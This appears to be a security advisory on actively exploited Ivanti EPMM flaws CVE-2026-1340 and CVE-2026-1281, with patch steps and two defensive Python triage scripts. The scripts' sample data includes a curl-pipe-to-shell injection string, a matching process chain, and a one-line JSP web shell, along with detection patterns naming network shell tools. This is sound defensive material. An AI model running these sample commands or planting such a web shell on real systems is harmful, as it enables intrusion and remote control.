CISA Adds Ivanti EPMM CVE-2026-1340 to KEV: Federal Patch Deadline Today

CISA has added CVE-2026-1340, a critical unauthenticated remote code execution flaw in Ivanti Endpoint Manager Mobile, to the Known Exploited Vulnerabilities catalogue with a federal agency deadline of 11 April. The vulnerability chains with CVE-2026-1281 to enable full appliance takeover and has been actively exploited since January 2026. All organisations running Ivanti EPMM on-premises must patch immediately.

#ivanti #epmm #mdm #rce #cisa-kev #unauthenticated #code-injection #cve-2026-1340 #cve-2026-1281

The Vulnerability Chain

Ivanti Endpoint Manager Mobile (EPMM), the enterprise mobile device management platform formerly known as MobileIron Core, is affected by two critical unauthenticated remote code execution vulnerabilities that have been actively exploited as zero-days since January 2026.

CVE-2026-1281 (CVSS 9.8): A code injection flaw in legacy bash scripts used by EPMM's Apache web server to handle URL rewriting. Attackers can send crafted HTTP requests that trigger arbitrary command execution without any authentication.

CVE-2026-1340 (CVSS 9.8): A code injection vulnerability in EPMM's Android File Transfer mechanism. Like CVE-2026-1281, exploitation requires no credentials and no user interaction. CISA added CVE-2026-1340 to the Known Exploited Vulnerabilities catalogue on 8 April 2026 and gave US Federal Civilian Executive Branch agencies until 11 April to apply patches, an emergency window of three days that reflects confirmed active exploitation.

The two vulnerabilities are frequently chained: CVE-2026-1281 provides the initial foothold and CVE-2026-1340 extends attacker capability on the compromised appliance.

Exploitation Activity

Unit 42 researchers documented widespread and largely automated exploitation activity against both vulnerabilities beginning shortly after Ivanti disclosed them in January 2026. The attack pattern is consistent:

  1. Unauthenticated attacker sends a crafted HTTP request to the EPMM web interface
  2. Code injection achieves execution on the EPMM appliance under the Apache service account
  3. Second-stage payload is downloaded, typically a web shell, cryptominer, or persistent backdoor
  4. Attacker establishes persistent access and conducts lateral movement or data collection

Because EPMM is a mobile device management platform, a compromised appliance provides access to:

  • Full device inventory, configuration profiles, and enrolled device certificates
  • Push notification infrastructure that can be abused to issue commands to managed devices
  • Network credentials and VPN configurations distributed to mobile devices
  • Potentially sensitive data synchronised through the MDM platform

Why MDM Platforms Are High-Value Targets

Ivanti EPMM is deployed by thousands of enterprises, government agencies, and educational institutions worldwide to manage smartphones, tablets, and laptops. A compromise of the MDM appliance is equivalent to compromising the management plane for an organisation's entire mobile fleet: an attacker who controls EPMM can see every device and its configuration, and in many implementations can push malicious profiles or certificates to enrolled devices.

This is not Ivantiโ€™s first significant EPMM vulnerability under active exploitation. The platform was also targeted via CVE-2023-35078 and CVE-2023-35082 in 2023, demonstrating sustained attacker interest in MDM infrastructure as a high-value pivot point.

Affected Versions and Patching

Both vulnerabilities affect all supported on-premises EPMM major version lines through 12.7.x. Ivanti has released patch RPMs for all supported branches. A permanent fix is included in version 12.8.0.0.

Patching is straightforward. Per Ivanti's advisory the fix is applied as a live update and requires no downtime, which removes any operational justification for delay.

Immediate (today):

  1. Identify all EPMM instances in your environment, including those managed by third-party IT providers or hosted at branch offices
  2. Apply the patch RPM for your version branch, then verify that the installed RPM version matches the one listed in Ivanti's advisory
  3. Restrict EPMM admin interface access to management networks only and remove any direct internet exposure of the admin panel. Both flaws are reachable without credentials, so this reduces exposure but is not a substitute for the patch
  4. Review EPMM logs for at least the past 90 days, which covers the January 2026 start of exploitation, for unusual HTTP requests, unexpected outbound connections, and anomalous device command issuance
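The log review in step 4 is easier with a script than by eye. The following is an added example, not Ivanti or Unit 42 tooling: it parses Apache combined-format access-log lines from the appliance, URL-decodes each request target twice (double-encoded payloads are common in automated exploitation), and flags two patterns the article describes: shell syntax in the decoded path or query, and POSTs to script files that are not in a baseline of known POST targets, which is how web-shell traffic appears in an access log. The log lines are constructed, the baseline set is constructed, and `/mifs/example` is a placeholder path, not the vulnerable endpoint (the article does not name one).

```python
"""Access-log triage for an EPMM appliance. Added example, not vendor code.
Sample log lines, the POST baseline and the '/mifs/example' path are constructed."""
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Command substitution, or a separator followed by a command word. Requiring the
# command word keeps ';jsessionid=...' path parameters from matching.
INJECTION_RE = re.compile(
    r"(\$\([^)]*\)|`[^`]*`|\$\{IFS\}|/dev/tcp/|"
    r"(?:;|\|\||&&|\|)\s*(?:/bin/|/usr/bin/)?(?:sh|bash|curl|wget|nc|ncat|python[23]?|perl|id|whoami|cat|echo)\b)"
)
SCRIPT_EXT_RE = re.compile(r"\.(jsp|jspx|php|cgi)$", re.I)

# POST targets seen during normal operation. Constructed here; in practice build
# it from the appliance's own pre-incident logs.
BASELINE_POST_PATHS = {"/mifs/j_spring_security_check"}


def decode_target(target):
    """URL-decode twice so double-encoded payloads are inspected in plain form."""
    return unquote(unquote(target))


def triage_access_log(lines):
    """Return (findings, requests_per_ip). Each finding is
    (reason, ip, method, decoded_target, status)."""
    findings = []
    per_ip = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            findings.append(("unparseable line", "-", "-", line[:80], 0))
            continue
        ip, method, status = m["ip"], m["method"], int(m["status"])
        per_ip[ip] += 1
        decoded = decode_target(m["target"])
        path = decoded.split("?", 1)[0].split(";", 1)[0]
        if INJECTION_RE.search(decoded):
            findings.append(("command-injection pattern", ip, method, decoded, status))
        elif method == "POST" and SCRIPT_EXT_RE.search(path) and path not in BASELINE_POST_PATHS:
            findings.append(("POST to script file outside baseline", ip, method, decoded, status))
    return findings, per_ip


def suspicious_ips(findings):
    """Source addresses with at least one finding, most findings first."""
    return [ip for ip, _ in Counter(f[1] for f in findings if f[1] != "-").most_common()]


# Constructed sample: two normal logins, one single- and one double-encoded
# injection attempt, a POST to a dropped .jsp, and a benign jsessionid URL.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2026:03:14:07 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jan/2026:03:14:09 +0000] "POST /mifs/j_spring_security_check HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Jan/2026:03:20:41 +0000] "GET /mifs/example?x=%24%28curl%20http%3A%2F%2F198.51.100.9%2Fa.sh%7Csh%29 HTTP/1.1" 500 0 "-" "python-requests/2.31"
198.51.100.23 - - [12/Jan/2026:03:20:45 +0000] "GET /mifs/example?x=%2524%2528id%2529 HTTP/1.1" 500 0 "-" "python-requests/2.31"
198.51.100.23 - - [12/Jan/2026:03:21:02 +0000] "POST /mifs/images/help.jsp HTTP/1.1" 200 41 "-" "python-requests/2.31"
192.0.2.50 - - [12/Jan/2026:03:25:00 +0000] "GET /mifs/login.jsp;jsessionid=9F3A HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found, _ = triage_access_log(SAMPLE_LOG.splitlines())
    for reason, ip, method, target, status in found:
        print(f"{ip:15} {method:4} {status} {reason}: {target}")
    print("review these sources:", suspicious_ips(found))
```

Run it against `/var/log/httpd/access_log` (or wherever the appliance keeps it) by feeding the file's lines to `triage_access_log`. Every hit should be pivoted on by source address: the same IP is usually responsible for the injection attempt, the drop of the script file, and the later POSTs to it.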

Detection:

  • Alert on unexpected processes spawned by the Apache service account on EPMM
  • Monitor for web shell indicators: unusual files in web-accessible directories, HTTP POST requests returning command output
  • Review device configuration push history for any profiles or certificates issued outside of normal change management
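The first two detection items above translate directly into host-side checks. The following is an added example, not Ivanti or CISA tooling: it parses a `ps -eo pid,ppid,user,comm,args` snapshot, walks each process's parent chain, and flags anything under httpd that is a network client, an interpreter, or a shell whose command line is a fetch-and-run chain; a bare shell under httpd is only a review item because, per the CVE-2026-1281 description, EPMM's Apache legitimately runs helper bash scripts. It then scans a set of web-root files for the Java and PHP primitives web shells use to turn request input into command execution. The ps snapshot, file paths and file contents are constructed; the `apache` user name, the `httpd` command name and the `/opt/webroot` path are assumptions about the appliance build, not facts from the advisory.

```python
"""Host-side triage for an EPMM appliance. Added example, not vendor code.
The ps snapshot, web-root path and file contents below are constructed, and the
'apache' user and 'httpd' command name are assumed, not taken from the advisory."""
import re

NETWORK_TOOLS = {"curl", "wget", "nc", "ncat", "socat"}
INTERPRETERS = {"python", "python2", "python3", "perl", "php"}
SHELLS = {"sh", "bash", "dash"}
# In a shell command line these mark fetch-and-run, not a local helper script.
EXEC_CHAIN_RE = re.compile(
    r"(curl|wget|/dev/tcp/|base64\s+(?:-d|--decode)|\|\s*(?:ba)?sh\b|python[23]?\s+-c|perl\s+-e)"
)
# Java and PHP primitives that turn request input into command execution.
WEBSHELL_MARKERS = re.compile(
    r"(Runtime\.getRuntime\(\)\.exec|new\s+ProcessBuilder\(|eval\(\s*base64_decode|"
    r"\b(?:system|passthru|shell_exec|popen)\(\s*\$_(?:GET|POST|REQUEST))"
)
SCRIPT_EXT = (".jsp", ".jspx", ".php", ".cgi")


def parse_ps(text):
    """Parse `ps -eo pid,ppid,user,comm,args` output into {pid: (ppid, user, comm, args)}."""
    procs = {}
    for line in text.strip().splitlines()[1:]:  # first line is the header
        pid, ppid, user, comm, *rest = line.split(None, 4)
        procs[int(pid)] = (int(ppid), user, comm, rest[0] if rest else comm)
    return procs


def has_httpd_ancestor(pid, procs, httpd_comm="httpd", max_depth=64):
    """Walk the parent chain from pid (inclusive) looking for an httpd process."""
    while pid in procs and max_depth > 0:
        ppid, _, comm, _ = procs[pid]
        if comm == httpd_comm:
            return True
        pid, max_depth = ppid, max_depth - 1
    return False


def triage_processes(procs, httpd_comm="httpd"):
    """Return (severity, pid, user, reason, args) for non-httpd processes under httpd.
    httpd workers themselves run as the service account and are expected; the
    signal is what they spawn."""
    findings = []
    for pid, (ppid, user, comm, args) in sorted(procs.items()):
        if comm == httpd_comm or not has_httpd_ancestor(ppid, procs, httpd_comm):
            continue
        name = comm.rsplit("/", 1)[-1]
        if name in NETWORK_TOOLS or name in INTERPRETERS:
            findings.append(("high", pid, user, f"{name} spawned under httpd", args))
        elif name in SHELLS and EXEC_CHAIN_RE.search(args):
            findings.append(("high", pid, user, "shell running a download/exec chain under httpd", args))
        else:
            # EPMM's Apache legitimately runs helper shell scripts (the CVE-2026-1281
            # component), so a bare shell or unknown binary is a review item, not an alert.
            findings.append(("review", pid, user, f"{name} under httpd", args))
    return findings


def scan_webroot(files):
    """files: {path: content}. Return script files containing exec primitives."""
    return sorted(
        path for path, content in files.items()
        if path.lower().endswith(SCRIPT_EXT) and WEBSHELL_MARKERS.search(content)
    )


# Constructed snapshot: a worker spawned `sh -c curl ... | sh`, which fetched a
# script and left a perl child behind; cron's logrotate shell is benign.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND  COMMAND
    1     0 root     systemd  /usr/lib/systemd/systemd
  812     1 root     httpd    /usr/sbin/httpd -DFOREGROUND
  901   812 apache   httpd    /usr/sbin/httpd -DFOREGROUND
  902   812 apache   httpd    /usr/sbin/httpd -DFOREGROUND
 1340   901 apache   sh       sh -c curl -s http://198.51.100.9/a.sh | sh
 1341  1340 apache   curl     curl -s http://198.51.100.9/a.sh
 1342  1340 apache   sh       sh
 1390  1342 apache   perl     perl -e use Socket;exit
 1400     1 root     crond    /usr/sbin/crond -n
 1401  1400 root     sh       sh -c /usr/sbin/logrotate /etc/logrotate.conf
"""

# Constructed web root (placeholder path): one dropped JSP shell beside normal files.
SAMPLE_FILES = {
    "/opt/webroot/mifs/images/help.jsp": '<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "/opt/webroot/mifs/login.jsp": "<html><body>Sign in</body></html>",
    "/opt/webroot/mifs/images/logo.png": "\x89PNG",
}

if __name__ == "__main__":
    for sev, pid, user, reason, args in triage_processes(parse_ps(SAMPLE_PS)):
        print(f"[{sev:6}] pid={pid} user={user} {reason}: {args}")
    print("web-shell candidates:", scan_webroot(SAMPLE_FILES))
```

On a live appliance, feed `parse_ps` the output of `ps -eo pid,ppid,user,comm,args` and build the `files` dictionary from the real web-root tree, reading only files with the script extensions. A process snapshot is a point-in-time check; for continuous coverage the same ancestry rule (non-httpd child of an httpd worker) is what to express in your EDR or auditd execve rules.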

If you believe you are already compromised:

Treat the EPMM appliance as fully compromised. Isolate it from the network, preserve forensic images for incident analysis, and begin rotating all credentials and certificates that have been distributed through the platform. Engage your incident response team immediately: the combination of device management access and credential visibility makes this a potentially severe breach scenario.